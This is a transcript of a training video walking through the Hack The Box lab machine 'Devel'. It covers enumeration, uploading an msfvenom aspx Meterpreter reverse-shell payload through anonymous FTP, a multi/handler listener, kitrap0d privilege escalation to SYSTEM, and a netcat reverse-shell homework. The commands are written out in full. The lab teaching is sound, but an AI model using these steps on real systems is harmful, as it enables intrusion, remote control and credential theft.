[00:00:00] All right, guys and girls, we are going to be working on a machine today called Devel. No, not "devil". Now this is a nice machine to take a step up. We've been mostly learning about SMB exploitation; today we're going to be learning a little bit more about shellcode generation and how we can do a little bit of enumeration. And let's just, let's not talk about it yet. Let's do our "first things first" kind of deal. Let's go ahead and spin up that machine, right? And let's go ahead and start an nmap scan. I'm going to open a new window here and we're going to do nmap -T4 -A -p-, and again, for the second video in a row, I've already forgotten what the IP address is. It's .5. We're going to scan .5 and we will let that scan. So, in my common stalling tactic, let's talk about the machine a little bit more in detail. What we're going to be seeing today is a machine that is very common, at least at the beginner levels of Hack The Box. Now the exploitation type isn't really as common, but what you're going to see is a very common port combination, something along the lines of port 21 and port 80. You see that a lot, where you have a website and you have port 21, or you might have port 22 and port 80, and you have to leverage an exploit somewhere in order to get somewhere else, and you're going to see that here in a minute.
[00:01:41] Now if you remember back to episode two, we talked about FTP. Remember we had FTP in our machine, it was Lame, right? We did Lame and we had FTP, and I talked about the staging process, about needing a place to execute an exploit, and you're going to see that come into play today. How can we leverage FTP if we have anonymous access, and how can we enumerate what is in front of us? So we're going to go ahead and just let this scan finish really quick, and then once the scan finishes we're going to be looking at it and we'll talk further into detail. OK, the scan has returned. So let's take a look here, and as I kind of discussed, we have port 21 and we have port 80 here. Now there is a little bit of information that is being disclosed to us. Here you can see that we have Microsoft IIS 7.5. Why do we know that? Well, because they're putting it in their headers. Now on a vulnerability assessment or a pen test, this is a no-no. This is an information disclosure. It's a low finding, it's very low, but all this is here is information disclosure, right? It's information gathering for us. We want to avoid this if we can.
[00:03:06] Same thing with the site title, IIS7. Now that's beginning to tell me, just from experience, that we're probably looking at a default web page if the title is going to be IIS7. On the other front, here we see that there is FTP open with anonymous login, and we can see there are some files in here that, to my experienced eye, look as if they are an IIS directory, right, a web root directory. So what we're looking at is anonymous login, which again is probably a no-no, right? Why are we allowing people to log in anonymously unless there's a very, very good reason for this? This is probably a ding on an assessment as well. If we scroll down through the rest, it's going to take some guesses at the operating system. It's not a phone. So again, this didn't really come through that great. I got some traceroute, nothing fancy. So we're going to focus here. So what it looks like here is we have a website and we've got FTP, so my enumeration for a website: first things first, the first thing I like to go do is go out to the website, and we'll just go to 10.10.10.5, and you see that it is in fact a default web page. If you click on this, it would go to Microsoft's website. Now you see this a lot during pen testing, OK?
[00:04:38] When we're doing pen testing we come across these default web pages a lot. Now this signifies one of two things. One, they have a website out in the open and they have it running on the back end somewhere at a different directory, right? There's probably a directory to a web page they're running, and it may resolve to a domain name. Let's just say Google: it may be like dev.google.com is where they're running on this web server, but when you just navigate to port 80 or port 443, the default web page is still here. This is a finding on a pen test as well. This signifies that there is poor hygiene, right, if we're seeing this. The other thing I should mention too, the other part of this, is OK, potentially they're not running a website; they just have IIS on for whatever reason. Again, same thing: poor hygiene. As an attacker, if I'm seeing default web pages, that makes me think, OK, what other things have you forgotten to turn off? Are you a lazy person, a lazy engineer on the other side that I'm up against? Why am I seeing these kinds of things? So because of this, it makes me really inquisitive, right? And when I see default web pages I think, OK, there's probably a reason that it's up there.
[00:06:02] If there is, then there's probably a hidden directory somewhere. So my first thought in this instance is I'm going to look for extra directories, and my favorite tool for that is called DirBuster. Now let's go ahead and open up a new tab. Now DirBuster stands for, or is short for, directory busting, and what we're doing is we're going to brute force directories here. So we'll say directory one, directory two, directory three, right? We'll just try to go through a whole list of directories that we provide and see if any of them come back. Now we may be able to find some hidden information, especially in capture-the-flag type stuff, and in real-world situations where you run into this. So let's go ahead and type in dirbuster. Now I like to do dirbuster & like this, so it starts its own process. OK. Another thing that I should note is there are other tools that we can use. DirBuster is my favorite. A lot of people are big on gobuster right now. I haven't jumped on that train. I've used it sometimes and it works very well. The other one that people like is called dirb, D-I-R-B. You can use either of those as well and be successful here. So what I'm going to do is I'm just going to copy the web address and I should paste it in here, and actually it didn't.
[00:07:24] OK. So we'll have to type in http:// and it likes the port 80 at the end like that. OK. On top of this, I like to use more threads, because we get to go faster when we do that. So on top of that we need a wordlist. Here is our wordlist area. Now Kali is very nice: if you go to the base here, there is a /usr/share folder, and then if you start typing wordlists, what you find there is a wordlists folder. So again, /usr/share/wordlists, inside of that is dirbuster, and then there's the wordlist. Now the one I like to use is the medium one, but for this instance we're going to use small, and in some cases, if you've really got a lot of time, there is a big wordlist out on GitHub. If you search for "dirbuster big wordlist", somebody has made one. So let's go ahead and select this wordlist. Now if we come down to the bottom down here, what were we looking at? We're going to brute force directories and files, and we're going to be recursive. That means if we find one directory, we're going to go ahead and go on and try to find more directories inside that directory. So this is great. The one thing that we're going to do here, though, is PHP is not what we're searching for.
[00:08:45] Now this is a Windows machine, right? In high probability we're running against a Windows machine, because we're running against Microsoft IIS, and we're going to be running against asp and aspx file extensions. asp and aspx file extensions are probably higher in probability, right, than php. If this were an Apache web server, for example, then we would be using a php extension, but in this instance I'm going to hedge my bet that it's not. So we're going to go ahead and say something along the lines of asp,aspx,ASP,ASPX. Now it'll search for all four extensions. On top of this, I always like to add in some other stuff when I'm doing this in a real-world assessment, like a txt file, a zip file, a bak file, a rar file, a secret, a database, etc. You can make this list longer; the longer you make this list, the longer it's going to take, especially if it starts finding directories. Now let's go ahead and hit start on this guy. Now I'll be honest, I have actually not run directory busting on this. I am just showing you my methodology when I see a web page, and especially when I see something like this. Now my eye, my trained eye, would actually go right here to FTP.
[00:10:06] OK, so FTP. I am seeing aspnet_client, I'm seeing iisstart.htm, and I'm seeing welcome.png. If we do a view page source, we come into here and we see welcome.png, right? So we could probably replace this file with a picture of something else if we wanted to. We could just go out to the web, and we can go to Google and let's just say something like "cute dog", right? We'll take the cute dog, let's go find an image of one, and let's say I want a JPEG, so OK, this one's a JPEG. I'm just going to go ahead and save that image out to my desktop and we'll just call it, we'll call it dog.jpg. Whoops, dog.jpg. All right. And this is just a proof of concept here that we are indeed in a web folder. So let's go ahead and do this. Blow it up. I'm going to change to my desktop, since that's where I put the file, and then let's FTP over to this web, or this machine I should say. Now it's going to ask for a name, and we saw that anonymous login worked, so we're just going to do anonymous, anonymous. OK. And then we have commands; type help and you get a lot of commands very similar to Linux. You could say ls, pwd.
[00:11:56] OK, you could see what directories you have access to. Now we could enumerate this. We could go into this aspnet_client and see if there are any files in here, dig deeper, get information out of it. Just to save time, I'm not going to do that, but just know that that's perfectly OK in terms of enumeration. So here let's go ahead and just do a put. This just means we're going to put something onto the server. I'm going to put dog.jpg onto the server. ls, looks like it's there. Nice. OK. So now we come here and we say /dog.jpg. I don't know what happened to my wonderful picture, but my wonderful picture is somewhat there. So we know that it worked, right? We could put a text file there, whatever, OK. Why is this important? Well, this is important because we talked about this two episodes ago: I can put things into this folder, but unless I have a second chain where I can have somebody execute them, or I can execute them myself, then FTP really isn't that vulnerable to me. But what did we just do? Well, we just came in here and we executed this file, right? We accessed this file, the server read this file and we've executed it. So what's stopping us then from putting malware onto this and doing the same thing?
[00:13:29] And that's really what I'm after. I want to put some malware onto this machine and I want to exploit it, right? So we're going to do that right now. So what we can do is we can use a tool called msfvenom. In the last episode, we very, very briefly talked about msfvenom, and one thing that you can do is, if you ever need a cheat sheet, you can just go up to Google and you could say "msfvenom cheat sheet", like you can see right here. You can do something like "msfvenom aspx" and just find something particular, like this is one that I've been to in the past. You could look at these cheat sheets here; there's a HighOn.Coffee cheat sheet as well. There's a bunch in here. They'll tell you like, hey, if you're doing it against a Windows machine, or hey, here's a recipe right here, and this is really what we're after, right? Because we know that they run asp/aspx on an IIS server, so this is the type of file we're going to need. Now, if this were an Apache server, OK, maybe we need an Apache payload, right? Or if it's JSP, or if they're using Tomcat, then we're going to do a WAR file, and we have a bunch of different cheat sheet payloads here. This is perfect. So what we're going to do is we're going to generate a payload, so all we're doing is generating malware.
[00:14:51] We are generating something that is going to say, hey, I'm listening on this connection, use this payload here, right, and this payload is going to be a Meterpreter payload. Remember that I told you in the last episode that if I have the opportunity, I will use the Meterpreter payload. We also could just use a generic Windows exploit payload here, but what we're going to do is we're going to use this type of payload and we're going to exploit it. OK. So this payload is going to say, hey, use this payload, contact back to me, reverse shell, right, contact back to me at my listening host, at my listening port. And then let's set a file type and a shell. So let's go ahead and type this out and then we'll talk about it in more detail. So we're going to do msfvenom and we're going to do a -p for payload. And this payload should look familiar to you, right? windows/meterpreter, and then we're going to say reverse_tcp. OK. Now we don't know if this host is going to be 32-bit or 64-bit, so let's start with 32-bit; if we need to improve the payload, we can. All right, so let's do this.
[00:16:06] We'll say LHOST= and then we need our IP address; mine is 10.10.14.24. We need a listening port; we're just going to use 4444 for now. And then we are going to say a file type, so I'm going to say -f aspx. You could also do asp, that'll be fine, but aspx. And then what we're going to do is put this all into a file, OK, we're going to call this -o ex.aspx. Now if we didn't put this into a file here, then this would print out shellcode for us, and we're not at that level right now of printing out, copying and putting it into things. We need this to be in its own aspx file, so when we execute it, it runs the command that it needs to, and it knows that, based on the file type, the server we're putting it on is appropriate for this aspx file type. OK. So we're going to hit enter. Now it's going to take a second to generate. It's going to put it on the desktop, since that's where we were, and then once it generates we need to do one other thing: we need to now open up one more new tab, and then I'm going to go into Metasploit, msfconsole. Follow along with this, and we're going to run that exploit handler. Now you saw all this in the last episode, you just saw it done for us; now we're going to do this ourselves. OK, so let's say use exploit/multi/handler. Now we really haven't gotten into netcat yet, but when we do, this is very similar to netcat. We are just listening, right?
[00:17:45] All we're doing is saying open up a listener on this port, talk back to me at this IP address, and it's just me listening on that port. So let's go ahead and just say options. You're going to see that there's literally nothing in here. So what we're going to have to do is set a payload, and the payload has to be identical to what we just generated. So that's going to be set payload windows/, and you should be able to autotab, it's just a little slow, meterpreter, and then we've got reverse_tcp. options again. OK, now let's set the LHOST to your IP address, your listening host. The port has to match as well; 4444 is the default. That's perfect, that's what we chose. Let's go ahead and run this. Now we're just going to let this sit here and it's going to run and listen. OK. So coming back to here, I bet we've lost our connection. Let's see if we have. We have. OK. Let's say bye and connect again, anonymous, anonymous. Now let's go ahead and put that ex.aspx file on here. We did it. Perfect. Another thing that I should note too is we are likely transferring in ASCII right now, ASCII. Preferably we should transfer via binary, so you type binary and then transfer your file.
[00:19:15] I think it's OK, but if you ever run into issues with FTP and you're transferring a file or a payload and it's not working, try switching to binary and then transferring the file again and seeing if that fixes anything. I've had that happen in the past. It's better to use binary over ASCII. OK, so we know how to call out, right? We've got a listener going, we've got our malware uploaded, and so we're waiting here for a connection. Now we need to engage that malware and make the server execute it. So /ex.aspx here, hit enter. OK, it engaged. And look, we just got a session, that easy. OK. So we say sysinfo: x86 Meterpreter. We won the lottery there; we got the right system on everything, OK. x86 Meterpreter, architecture x86, Windows 7 build. And then we say getuid. Crap. We are not NT AUTHORITY\SYSTEM. Darn it. So we can't do things like hashdump right now, right? We're not system. Now there is a tool that we can try to use called getsystem. Hit enter. Didn't work. That's OK. Sometimes you get a win from this, but do note that on a rare occasion that actually can crash a machine if you're doing it on a pen test.
[00:20:39] So be very careful. But one of the favorite things that I want to show you, and I talked about it last time, is there are post modules in Meterpreter. So what we can do with our session is we can actually background the session, and then we can say, let's search for this. We'll say search suggester, like this. And there's only one, but look, this is a post module here. So let's copy this and we're going to say use, paste this, hit enter, and then let's look at our options now and look what it's going to ask for. It's going to say, hey, all I need is this session, because you already have a session. So just give me that and I'll access that session and we'll do a little bit of enumeration. So this is post-exploitation enumeration. OK. So we're going to say set session 1. Now we're going to run this. And what this is going to do is it's going to look through all the x86 exploits that it knows of that are privilege escalation exploits. It's going to compare what's going on in the Windows system and say, hey, yeah, that might be good for this, or no, that's not going to work. And then it's going to return a list of those that will possibly work for us. OK. And this will only take a minute.
[00:21:59] And then what happens is we're going to go through this list and we're going to say, OK, I'm going to try the first one, or the second one, or the third one, and we're just going to keep going until we know, you know, if it's vulnerable, look, I mean you're coming through. So the best scenario for us here is we've got one, two, three, four, five. We could go through this whole list if we're desperate. The one that I like to use, we could use this bypassuac_eventvwr. Let's just go straight for the win here. I believe kitrap0d is going to work. kitrap0d is pretty friendly, so let's go ahead and say use, paste. Now I'm going to show you something. Let's type in options. Let's set the session to 1, and look, it already has our target as Windows 7, that's fine, x86. Perfect. So our session's good. And let's type in options again, OK. Look at the screen, remember the screen, see what happens. Now let's hit run. This is not going to work, OK. We launched a process, we did not get a reverse shell back. Let's type in options again, look what changed. Now payload options are in here. Why didn't this work? Well, for me, it always tends to default back to my Ethernet interface.
[00:23:19] I don't know why it does this. So you could, without seeing the screen, if you keep it in the back of your mind, you could just say, hey, I know that I need my LHOST to be 10.10.14.24. And you know what? I know I'm already on an LPORT of 4444, so I'm already listening, or I've already used that port up. Let's do something different. Let's set the LPORT to 4445. It's fine, right? Let's look at our options now. OK. And now let's try running this and let's see if we can get this to work. So it might take a second; from the first exploitation it might take a second here. OK. And what has happened? I've lost my session. So let's go ahead, and I'm going to Ctrl-C here. What we need to do is set up another listener, and we could probably just tab up a little bit. There you go. And then say options here. OK. So I'm going to run this again. We just need to execute that payload. Sometimes your listener dies. Hopefully you're a little bit more fortunate than me and yours didn't. You can see now that we've generated again, we've got the shell. We'll be quick about this.
361 00:24:38,930 --> 00:24:41,950 We'll go background, you tab up a few times. 362 00:24:41,960 --> 00:24:49,550 We've got the kitrap0d in there already, set the session to two instead of one because our new session 363 00:24:49,550 --> 00:24:56,430 is session two, and then we'll say options, and now let's go ahead and run it. 364 00:24:56,560 --> 00:25:00,570 And it's possible that we killed our session with the failed attempt there. 365 00:25:00,610 --> 00:25:06,160 What I actually believe happens is that it goes, it tries to connect, and then you potentially lose your 366 00:25:06,160 --> 00:25:09,790 session because it closes out the other one to exploit it to be the new one. 367 00:25:10,270 --> 00:25:13,460 So let's try this one here, OK. 368 00:25:13,470 --> 00:25:16,230 And now we ran the session and we're OK. 369 00:25:16,380 --> 00:25:22,290 So if you lost your session like me, showing you proof of concept, know in the back of your mind that, hey, 370 00:25:22,290 --> 00:25:28,570 I probably want to set an LPORT on these previous tasks, or an LHOST as well, in these previous attempts. 371 00:25:28,920 --> 00:25:34,800 And then let's go ahead and say getuid, and you can now see that we're NT AUTHORITY\SYSTEM. 372 00:25:34,800 --> 00:25:40,950 So same thing as before, we can do a hashdump, look at the hashes, we can go grab the, 373 00:25:41,730 --> 00:25:47,930 the root, the user, whatever the flags are on those. Not going to show you to do that. We can load modules, 374 00:25:48,330 --> 00:25:50,040 you've seen that over and over, right? 375 00:25:50,040 --> 00:25:53,010 This is kind of coming, becoming repetition. 376 00:25:53,010 --> 00:25:55,650 So this is a great way of doing this.
377 00:25:55,680 --> 00:26:03,430 My challenge to you is look into payloads, OK? I don't know what the command is, I believe it's msfvenom 378 00:26:03,430 --> 00:26:10,990 -l, might not be -l, there is a payload option in here that lists out all the payloads. 379 00:26:14,320 --> 00:26:21,660 OK, let's do a -l payloads then, and it lists all the payloads. 380 00:26:21,660 --> 00:26:30,800 My suggestion is to go back into this machine and, instead of running Meterpreter, try running a Windows 381 00:26:31,400 --> 00:26:35,380 reverse TCP payload or something along those lines. 382 00:26:35,600 --> 00:26:36,380 See all these windows 383 00:26:36,380 --> 00:26:44,300 meterpreter ones, let's skip those, just run a Windows reverse TCP shell, shell_reverse_tcp, which is right here. 384 00:26:44,360 --> 00:26:45,740 Try doing that as your payload. 385 00:26:46,340 --> 00:26:46,780 OK. 386 00:26:47,850 --> 00:26:54,440 And with that as your payload you don't have to use Meterpreter, so what you can do is instead, you can 387 00:26:54,440 --> 00:27:01,200 just say, hey, instead of using the exploit/multi/handler, I'm going to say netcat -nvlp on port 388 00:27:01,460 --> 00:27:06,900 4444 here, and then just wait for a session to come across, and that's it. 389 00:27:07,460 --> 00:27:14,150 OK, so my challenge to you is to redo this exploit using it manually as opposed to using Metasploit and 390 00:27:14,150 --> 00:27:16,730 Meterpreter, and see what your results are. 391 00:27:16,730 --> 00:27:19,610 So a little bit of homework, but that is it for this episode. 392 00:27:19,610 --> 00:27:26,270 So we, we took our, our scan, we looked at some things, and we could check real quick on the, on the dirbuster, 393 00:27:26,270 --> 00:27:30,430 like I said, never ran before, and it hasn't found anything, and that's fine. 394 00:27:30,440 --> 00:27:35,330 It finished the requests, so, you know, it's always good to do directory busting.
395 00:27:35,330 --> 00:27:40,580 It's also good to run Nikto, so if this were actually a website, we'll get to Nikto at some point. 396 00:27:40,580 --> 00:27:43,430 But if this were a website, good to run Nikto as well. 397 00:27:43,430 --> 00:27:50,720 Directory busting, of course inspect the website, but here it was really apparent, to a trained eye, 398 00:27:50,750 --> 00:27:57,600 that FTP was the way to go because we had execution here. We did a proof of concept with the dog JPEG 399 00:27:58,220 --> 00:28:04,370 and then we were able to generate a payload with msfvenom and then execute it here and get a shell, 400 00:28:05,210 --> 00:28:11,240 and then we also went in and we were able to use the exploit suggester and use that to get another 401 00:28:11,240 --> 00:28:11,790 shell. 402 00:28:11,900 --> 00:28:13,790 There's maybe a lot of information, right? 403 00:28:13,790 --> 00:28:16,880 This is some, some new tricks that I'm throwing at you. 404 00:28:17,180 --> 00:28:18,510 Please re-watch the video. 405 00:28:18,530 --> 00:28:24,620 Please try it on your own as well, take everything and try the manual way, and then try it again this 406 00:28:24,620 --> 00:28:25,180 way as well. 407 00:28:25,180 --> 00:28:30,820 See if you can repeat all the steps I did without watching the video, just using your notes. 408 00:28:30,920 --> 00:28:35,150 It's always good to have a good notebook, so if you're not doing that already, go ahead and start doing 409 00:28:35,150 --> 00:28:36,290 that now. 410 00:28:36,290 --> 00:28:38,290 But that is it for this lesson. 411 00:28:38,420 --> 00:28:40,720 I am TCM, until the next one. 412 00:28:40,730 --> 00:28:41,380 I really do 413 00:28:41,380 --> 00:28:42,320 thank you for joining me.